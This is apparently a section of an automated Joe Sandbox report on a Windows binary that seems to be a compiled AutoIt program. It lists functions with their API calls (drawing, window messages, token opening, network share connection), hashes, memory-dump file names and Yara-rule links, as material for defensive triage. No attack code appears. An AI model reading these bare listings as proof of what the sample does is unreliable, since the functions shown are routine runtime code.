MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 006FE860
LineTo.GDI32(00000000,?,?), ref: 006FE86D
EndPath.GDI32(00000000), ref: 006FE87D
StrokePath.GDI32(00000000), ref: 006FE88B

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 7d4335d852e27441b5791776a2c7d385a79189f18f1d863a1c0217ce267bf41b
Instruction ID: 6cae861f38c2e9e5ed127430d20a5358be8e792ddb0305f0d0ae3f45c10d64bb
Opcode Fuzzy Hash: 7d4335d852e27441b5791776a2c7d385a79189f18f1d863a1c0217ce267bf41b
Instruction Fuzzy Hash: 40F05E31005259BBDB226F58AC0DFCE3F9AAF0A322F04C101FA11251E1C7BE9A51DF99

Function 006CD623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 006CD640
GetWindowThreadProcessId.USER32(?,00000000), ref: 006CD653
GetCurrentThreadId.KERNEL32 ref: 006CD65A
AttachThreadInput.USER32(00000000), ref: 006CD661

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: b1551c3336d4b20c539f67c787f8912551caeaca8d9a00fdbdbea5e958c7f3fd
Instruction ID: d6fd87f29c4e0efcf5c470a124829093e59468c76906f54e464679d1b774f4cf
Opcode Fuzzy Hash: b1551c3336d4b20c539f67c787f8912551caeaca8d9a00fdbdbea5e958c7f3fd
Instruction Fuzzy Hash: 85E03931101228BADB205BA69C0DFEB7F6CEF117A1F00C024B90C850A0CB799980CBA4

Function 006CBDF8 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 006CBE01
OpenThreadToken.ADVAPI32(00000000,?,?,?,006CB9C9), ref: 006CBE08
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006CB9C9), ref: 006CBE15
OpenProcessToken.ADVAPI32(00000000,?,?,?,006CB9C9), ref: 006CBE1C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 26f932215872bc23c6649765113f0d7b5865c812be954daa5a158e13815df318
Instruction ID: ef4c0ac4389e6c288129838e12a4823d4e5c5230d08c1c5be1ae63d972e0b1a7
Opcode Fuzzy Hash: 26f932215872bc23c6649765113f0d7b5865c812be954daa5a158e13815df318
Instruction Fuzzy Hash: F2E04F32641221EBD7205FB59D0DBE63AA8EF58B92F00C818F241DA080D76C88418B65

Function 006AB0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 006AB0C5
SetTextColor.GDI32(?,000000FF), ref: 006AB0CF
SetBkMode.GDI32(?,00000001), ref: 006AB0E4
GetStockObject.GDI32(00000005), ref: 006AB0EC
GetWindowDC.USER32(?,00000000), ref: 0070ECFA
GetPixel.GDI32(00000000,00000000,00000000), ref: 0070ED07
GetPixel.GDI32(00000000,?,00000000), ref: 0070ED20
GetPixel.GDI32(00000000,00000000,?), ref: 0070ED39
GetPixel.GDI32(00000000,?,?), ref: 0070ED59
ReleaseDC.USER32(?,00000000), ref: 0070ED64

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: c7ccc9de81bd9a9be46993bdae7466031d66019cff855abf459b185d268fdef4
Instruction ID: 7126018c88bb3697990e60d6fd3188760ff8a301d93e08c2db2436a814b91261
Opcode Fuzzy Hash: c7ccc9de81bd9a9be46993bdae7466031d66019cff855abf459b185d268fdef4
Instruction Fuzzy Hash: 33E03931100244FAEB215B78AC097C83B21AB16335F14C326F6A9580E2D37A4940DF21

Function 0070C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0070C0A0
GetDC.USER32(00000000), ref: 0070C0AA
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0070C0C9
ReleaseDC.USER32 ref: 0070C0E8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 7d2485f82dca88ef13c394c5995ece5553610ddcf22920e004764a117733430b
Instruction ID: 6420e789cbd618ac596ce9f8367d107aadcded5d66776f669738f571703025b3
Opcode Fuzzy Hash: 7d2485f82dca88ef13c394c5995ece5553610ddcf22920e004764a117733430b
Instruction Fuzzy Hash: 28E04FB1500200EFDB106F74CC486A93BE5EB4C390F11C405FC4A87290DA7D9C818F08

Function 0070C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0070C0B4
GetDC.USER32(00000000), ref: 0070C0BE
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0070C0C9
ReleaseDC.USER32 ref: 0070C0E8

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 24cfedd9bb465f95eda00a8b7070e8d5a1931239c6f75087eda3535d4f40fdcc
Instruction ID: 4c3f6859405b70cfd6be8e2f242e6da8176cb8b0c533e567f7039d14716d315c
Opcode Fuzzy Hash: 24cfedd9bb465f95eda00a8b7070e8d5a1931239c6f75087eda3535d4f40fdcc
Instruction Fuzzy Hash: 70E04FB1500200EFDB106F74CC486993BE5EB4C390F11C405F94A87290DB7D9D418F08

Function 00712350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 006967D0

Strings

>, xrefs: 00712414
DEFINE, xrefs: 0071265C

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _memmove
String ID: >$DEFINE
API String ID: 4104443479-1664449232
Opcode ID: f83968d0aca3ac71d95b9abe05d1fc79df553b9befc3a255895b74a138553348
Instruction ID: 8fe9b6cc7ce36373fa3a165b0af44a7b297215704e9451718d9f3daf1cfb4b26
Opcode Fuzzy Hash: f83968d0aca3ac71d95b9abe05d1fc79df553b9befc3a255895b74a138553348
Instruction Fuzzy Hash: 43124B75A0020ADFCF24CF58C4906EDB7B6FF48310F25815AE855AB391D738AE96DB90

Function 006CEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 006CECA0

Strings

AutoIt3GUI, xrefs: 006CEC18
Container, xrefs: 006CEC1F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: 344fe2f92fd021d06fb923180b3196b5e080002cf6f9a79bb70d1c1dfa39e862
Instruction ID: 79a44de46dbb5bae25d9d331f5ad449436b666256b8ee29398ec3329366c1b0f
Opcode Fuzzy Hash: 344fe2f92fd021d06fb923180b3196b5e080002cf6f9a79bb70d1c1dfa39e862
Instruction Fuzzy Hash: 089116746006019FDB54DF68C884FAABBB6FF48710B14856EF94ACB391EBB5E841CB50

Function 006DE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00693BCF: _wcscpy.LIBCMT ref: 00693BF2

Part of subcall function 006984A6: __swprintf.LIBCMT ref: 006984E5
Part of subcall function 006984A6: __itow.LIBCMT ref: 00698519

__wcsnicmp.LIBCMT ref: 006DE785
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006DE84E

Strings

LPT, xrefs: 006DE77F

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: 2d8bfd84a85ebdb525ceb21fc4b66ffb589000d36677d63194241b0c381569d1
Instruction ID: 4e9092b667726d16d87828a23d19658a3e7d41abeffb826ba460245f4f25a67e
Opcode Fuzzy Hash: 2d8bfd84a85ebdb525ceb21fc4b66ffb589000d36677d63194241b0c381569d1
Instruction Fuzzy Hash: DE615C75E00215AFDB14EB98C891EEEB7FAAF49310F04416AF506AF390DB71AE40DB54

Function 00691B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00691B83
GlobalMemoryStatusEx.KERNEL32 ref: 00691B9C

Strings

@, xrefs: 00691B91

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: cc6ad96b3637850fed5b5bed5790574d99fd2acd811f6b797f8fcac2032e6c83
Instruction ID: 453da6dbd37ab707bf936a978eadb523791f2e4ae3a133e3f10e863a263fe056
Opcode Fuzzy Hash: cc6ad96b3637850fed5b5bed5790574d99fd2acd811f6b797f8fcac2032e6c83
Instruction Fuzzy Hash: EC519E714087459BE720AF14D895BABBBECFF96354F41884DF1C8410A2EB35896CCB6B

Function 006DCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 0069417D: __fread_nolock.LIBCMT ref: 0069419B

_wcscmp.LIBCMT ref: 006DCF49
_wcscmp.LIBCMT ref: 006DCF5C

Strings

FILE, xrefs: 006DCE91

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 8dc1fd43fe52a802d2eca1fcf224dd8df9d19e54cf930703e51a76a8bf535c5f
Instruction ID: 987b065dfc8d4bb164b8101b811e2248df64b2148438c68a73c41de19bc58f43
Opcode Fuzzy Hash: 8dc1fd43fe52a802d2eca1fcf224dd8df9d19e54cf930703e51a76a8bf535c5f
Instruction Fuzzy Hash: 4141B172A0421ABADF509BA4CC81FEF7BBF9F49720F00046EF601E6291DB719A45C764

Function 006B9AF3 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B889E: __getptd_noexit.LIBCMT ref: 006B889E

__getbuf.LIBCMT ref: 006B9B8A
__lseeki64.LIBCMT ref: 006B9BFA

Strings

pMl, xrefs: 006B9AF7, 006B9C29, 006B9AFB, 006B9B89, 006B9BB3

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __getbuf__getptd_noexit__lseeki64
String ID: pMl
API String ID: 3311320906-2858659193
Opcode ID: 4ffc2f9d64081a4211cd98bcb34cabe08a6f344b82201cec0e13fdc61b7c910d
Instruction ID: 9a6c7a30997f2b0887399edb4c26ca07ab5f326364182b507fe691e974260b1b
Opcode Fuzzy Hash: 4ffc2f9d64081a4211cd98bcb34cabe08a6f344b82201cec0e13fdc61b7c910d
Instruction Fuzzy Hash: A54102F1504B059FD7348B28D891AFB7BE69F45320F14861DE6AA873D2D774D8818B60

Function 006FA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000027,00001132,00000000,?), ref: 006FA668
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 006FA67D

Strings

', xrefs: 006FA5D1

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 8e67d5e34d6ea934f88ff2897307f68bb3f2ae681326a081b5e04cece07094ea
Instruction ID: 8777c015e5852b0e0fc249d5957882ca90bac0b8b4ddfe45d6c3152f301ba101
Opcode Fuzzy Hash: 8e67d5e34d6ea934f88ff2897307f68bb3f2ae681326a081b5e04cece07094ea
Instruction Fuzzy Hash: 3641FAB5A003099FDB54CFA8C991BEA7BB6FF09300F144469EA09DB345D770A945CF91

Function 006F9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 006F961B
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 006F9657

Strings

static, xrefs: 006F95B7

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: a743500e2ef60197f020929d510c5842642c0cb7bb0ad5c770da1d91faaac9ff
Instruction ID: 8e01058055ee6f7cf3df1f5e88a3adc96ca10dd5d80b0de9589e161574349f34
Opcode Fuzzy Hash: a743500e2ef60197f020929d510c5842642c0cb7bb0ad5c770da1d91faaac9ff
Instruction Fuzzy Hash: 7F31B031500208AEEB109F68CC40FFB77AAFF49764F008519F9A9C7190CA31AC81CB64

Function 006D5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006D5BE4
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D5C1F

Strings

0, xrefs: 006D5BDD

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 14a5df7a26eb66fa698348f44a3176a833d1e02b849febe27a298ee3dc7407c0
Instruction ID: 5b5e91ca5e31f05d89cae92697cdd44d38aa1cf663996fb121bdc2176025ec27
Opcode Fuzzy Hash: 14a5df7a26eb66fa698348f44a3176a833d1e02b849febe27a298ee3dc7407c0
Instruction Fuzzy Hash: 8B31A971E10705ABEB25DF98C885BEE7BF6EF05350F18401EE982967A0D7B09944CF50

Function 006E6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON

Download Yara Rule

APIs

__snwprintf.LIBCMT ref: 006E6BDD

Part of subcall function 0069CAEE: _memmove.LIBCMT ref: 0069CB2F

Strings

, $, xrefs: 006E6C1D
AUTOITCALLVARIABLE%d, xrefs: 006E6BCF

Memory Dump Source

Source File: 0000002E.00000002.2538130152.0000000000691000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00690000, based on PE: true

Associated: 0000002E.00000002.2537950289.0000000000690000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000073E000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000074A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.000000000076A000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2538130152.00000000007F2000.00000040.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539425168.00000000007F8000.00000080.00000001.01000000.0000000B.sdmpDownload File
Associated: 0000002E.00000002.2539701464.00000000007F9000.00000004.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_690000_UNK_.jbxd

Similarity

API ID: __snwprintf_memmove
String ID: , $$AUTOITCALLVARIABLE%d
API String ID: 3506404897-2584243854
Opcode ID: e1444a6d911965d5cd0e66d3cd595a39746393da8c998a3e0b744f68dcc33efe
Instruction ID: 27eb734cab3a487fae8518ed0d6d272eed770190383182b5d0eb121088c40d24
Opcode Fuzzy Hash: e1444a6d911965d5cd0e66d3cd595a39746393da8c998a3e0b744f68dcc33efe
Instruction Fuzzy Hash: EA219171600218AECF50EF94CC82EAD77BAEF54B40F104459F549AB241DB74EE46CB69

Function 006F91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000143,00000000,?), ref: 006F9269
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006F9274

Strings

Combobox, xrefs: 006F9236

Memory Dump Source

